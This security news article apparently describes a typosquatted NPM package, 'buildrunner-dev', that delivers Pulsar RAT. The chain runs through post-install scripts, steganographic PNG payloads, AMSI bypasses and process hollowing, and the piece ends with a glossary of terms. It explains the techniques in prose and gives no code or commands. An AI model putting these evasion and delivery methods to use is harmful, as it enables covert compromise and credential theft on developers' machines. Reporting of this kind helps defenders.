Stealth by Pixels: How Hackers Use Images to Hijack Developer Machines Worldwide

It started with a typo. A developer, perhaps rushing through a late-night coding session, accidentally installs the “buildrunner-dev” NPM package - assuming it's a maintained fork of a familiar tool. Unbeknownst to them, this single keystroke opens the door to one of the most sophisticated supply-chain attacks in recent memory: malware delivered not in code, but hidden within the pixels of harmless-looking images.

The attack chain is a masterclass in deception. The “buildrunner-dev” package, uploaded to the NPM registry, masquerades as a legitimate tool. Its source code appears innocuous, but a hidden post-install script quietly downloads an obfuscated batch file from a remote repository. This script, padded with junk data and misleading comments, is designed to fool both static and casual human review.

Once installed, the script copies itself to the Windows Startup folder, ensuring it runs at every logon. If administrator rights are needed, it exploits a Windows UAC bypass, escalating privileges without raising any alarms. The real magic, however, lies in what happens next: the batch file launches a PowerShell script that fetches what appear to be ordinary PNG images from a public hosting site.

These images are anything but ordinary. Using a custom steganographic routine, the malware extracts embedded code from the color values of each pixel. The first two pixels reveal the payload size, while the rest of the image contains the encrypted script - completely invisible to the naked eye and most security tools. The extracted code disables Microsoft’s AMSI (Antimalware Scan Interface), ensuring subsequent payloads remain undetected.

The next stage is a technical tour de force. A larger PNG delivers a compressed .NET loader, which employs process hollowing to inject the final malware, Pulsar RAT, into a legitimate Windows process. Multiple AMSI bypasses, dynamic API resolution, and layers of encryption guarantee that no suspicious code is ever left exposed on disk.

Configuration data - also hidden in images - reveals the attackers’ meticulous planning: custom command-and-control channels, anti-analysis tricks, and tailored persistence strategies depending on the victim’s antivirus software. The ultimate payload, Pulsar RAT, is a Quasar-based trojan equipped for fileless operation, credential theft, stealth remote desktop, and full system takeover.

This campaign is a stark warning: the software supply chain is now a battlefield where even the humble PNG file can be weaponized. Developers - often the first line of defense - are now prime targets in a war fought with pixels, scripts, and shadows.

Conclusion: As attackers blend social engineering, steganography, and advanced evasion, the line between benign and malicious blurs. Vigilance, security hygiene, and a healthy skepticism toward third-party packages have never been more vital. In the age of invisible threats, what you don’t see can hurt you most.

WIKICROOK

• Steganography: Steganography hides secret messages or code within everyday files, like images or audio, making the hidden information difficult to detect.
• AMSI (Antimalware Scan Interface): AMSI is a Windows feature that lets security software scan and block malware hidden in scripts or applications, improving system protection.
• Process Hollowing: Process hollowing is a technique where malware hides in a legitimate program’s memory, allowing it to evade detection and execute malicious actions.
• NPM Typosquatting: NPM typosquatting is when attackers upload malicious packages with names similar to popular ones, tricking users into accidental installation and potential compromise.
• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.